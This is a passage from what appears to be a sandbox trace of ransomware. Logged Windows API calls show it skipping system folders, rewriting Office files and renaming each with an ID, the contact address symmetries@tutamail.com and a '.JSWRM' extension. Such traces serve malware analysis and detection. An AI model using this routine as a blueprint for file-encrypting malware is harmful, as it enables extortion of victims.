hHeap=0x1e0000) returned 1 [0122.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0122.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0122.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.521] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0122.521] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0122.521] ReadFile (in: hFile=0x238, lpBuffer=0x209788, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.522] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.522] WriteFile (in: hFile=0x238, lpBuffer=0x209788*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0122.522] CloseHandle (hObject=0x238) returned 1 [0122.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0122.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0122.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0122.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0122.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0122.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0122.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0122.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0122.522] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0122.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0122.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0122.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0122.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0122.523] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4855a5d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4855a5d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4855a5d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_STD_K_COL.HXK", cAlternateFileName="VI5545~1.HXK")) returned 1 [0122.523] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2=".") returned 1 [0122.524] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2="..") returned 1 [0122.524] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2="...") returned 1 [0122.524] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2="windows") returned -1 [0122.524] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2="recovery") returned 1 [0122.524] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2="perflogs") returned 1 [0122.524] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2="documents and settings") returned 1 [0122.524] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.524] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2="system volume information") returned 1 [0122.524] lstrcmpiW (lpString1="VISIO_STD_K_COL.HXK", lpString2="msocache") returned 1 [0122.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_K_COL.HXK", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0122.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_K_COL.HXK", cchWideChar=19, lpMultiByteStr=0x240f70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD_K_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0122.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_K_COL.HXK", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0122.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD_K_COL.HXK", cchWideChar=19, lpMultiByteStr=0x241308, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD_K_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0122.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0122.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0122.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0122.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.525] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0122.525] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0122.525] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.526] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.526] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0122.526] CloseHandle (hObject=0x238) returned 1 [0122.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0122.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0122.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0122.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0122.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0122.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0122.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.526] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_STD_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_std_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0122.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0122.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0122.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0122.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0122.527] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3437c9a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3437c9a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3437c9a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xec50, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISUTILS.VSL", cAlternateFileName="")) returned 1 [0122.527] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2=".") returned 1 [0122.527] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2="..") returned 1 [0122.527] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2="...") returned 1 [0122.528] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2="windows") returned -1 [0122.528] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2="recovery") returned 1 [0122.528] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2="perflogs") returned 1 [0122.528] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2="documents and settings") returned 1 [0122.528] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2="$RECYCLE.BIN") returned 1 [0122.528] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2="system volume information") returned 1 [0122.528] lstrcmpiW (lpString1="VISUTILS.VSL", lpString2="msocache") returned 1 [0122.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0122.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUTILS.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUTILS.VSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUTILS.VSL", lpUsedDefaultChar=0x0) returned 12 [0122.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0122.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0122.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUTILS.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUTILS.VSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUTILS.VSL", lpUsedDefaultChar=0x0) returned 12 [0122.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0122.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0122.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visutils.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.529] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=60496) returned 1 [0122.529] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xec50) returned 0x24e1d8 [0122.529] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xec50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xec50, lpOverlapped=0x0) returned 1 [0122.534] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.534] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xec50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xec50, lpOverlapped=0x0) returned 1 [0122.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.536] CloseHandle (hObject=0x238) returned 1 [0122.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0122.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0122.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0122.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0122.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0122.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.536] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visutils.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISUTILS.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visutils.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0122.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.537] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x364ddb2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x364ddb2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x364ddb2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x12e68, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISWEB.VSL", cAlternateFileName="")) returned 1 [0122.537] lstrcmpiW (lpString1="VISWEB.VSL", lpString2=".") returned 1 [0122.537] lstrcmpiW (lpString1="VISWEB.VSL", lpString2="..") returned 1 [0122.537] lstrcmpiW (lpString1="VISWEB.VSL", lpString2="...") returned 1 [0122.537] lstrcmpiW (lpString1="VISWEB.VSL", lpString2="windows") returned -1 [0122.537] lstrcmpiW (lpString1="VISWEB.VSL", lpString2="recovery") returned 1 [0122.537] lstrcmpiW (lpString1="VISWEB.VSL", lpString2="perflogs") returned 1 [0122.537] lstrcmpiW (lpString1="VISWEB.VSL", lpString2="documents and settings") returned 1 [0122.537] lstrcmpiW (lpString1="VISWEB.VSL", lpString2="$RECYCLE.BIN") returned 1 [0122.537] lstrcmpiW (lpString1="VISWEB.VSL", lpString2="system volume information") returned 1 [0122.538] lstrcmpiW (lpString1="VISWEB.VSL", lpString2="msocache") returned 1 [0122.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0122.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISWEB.VSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISWEB.VSL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISWEB.VSL", lpUsedDefaultChar=0x0) returned 10 [0122.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0122.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0122.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISWEB.VSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISWEB.VSL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISWEB.VSL", lpUsedDefaultChar=0x0) returned 10 [0122.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0122.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0122.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0122.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISWEB.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visweb.vsl"), 